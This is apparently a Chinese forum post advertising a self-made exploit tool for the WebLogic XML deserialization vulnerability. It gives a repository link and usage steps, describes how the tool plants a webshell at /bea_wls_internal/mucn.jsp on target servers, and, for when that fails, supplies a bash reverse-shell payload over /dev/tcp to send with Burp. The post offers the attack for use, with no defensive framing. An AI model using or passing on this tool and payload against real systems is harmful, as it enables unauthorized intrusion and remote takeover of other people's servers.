【自制poc】weblogicXML反序漏洞
weblogic xml反序poc地址:https://gitee.com/mucn/weblogic
weblogicXML
Description
weblogicXML漏洞检测利用工具
所需配置项:
python3+
requests模块
模块安装:
没用装request模块的运行如下命令安装模块
pip install requests
使用方法:
git clone https://gitee.com/mucn/weblogic
python3 weblogicXML.py
可能会出现的问题:
输入地址后程序长时间无反应或等待一段时间后出现报错。
如图1
解决方法:可能木马已经写入成功,请自行访问目标网站/bea_wls_internal/mucn.jsp 若存在如下页面说明木马写入成功。
如图2
程序运行结果为:目标可能存在weblogicXML反序漏洞,但写马失败,请自行手动检测
解释:木马应该确实没有写入成功。
如图3
解决:你可以使用burp发包方式向目标发送POC,进行反弹shell测试(一般这种是可以成功反弹shell的)。
反弹shell POC
/bin/bash
-c
bash -i >& /dev/tcp/服务器地址/服务器端口 0>&1
其他问题:暂无
http://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh2AKvYmAAECGKu6otY148.pnghttp://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh2AICg7AAA2J_OCW-8140.pnghttp://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh6AWy4XAADegcpntRI125.pnghttp://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh6AKI4xAADSX8Jjn1c711.png
页:
[1]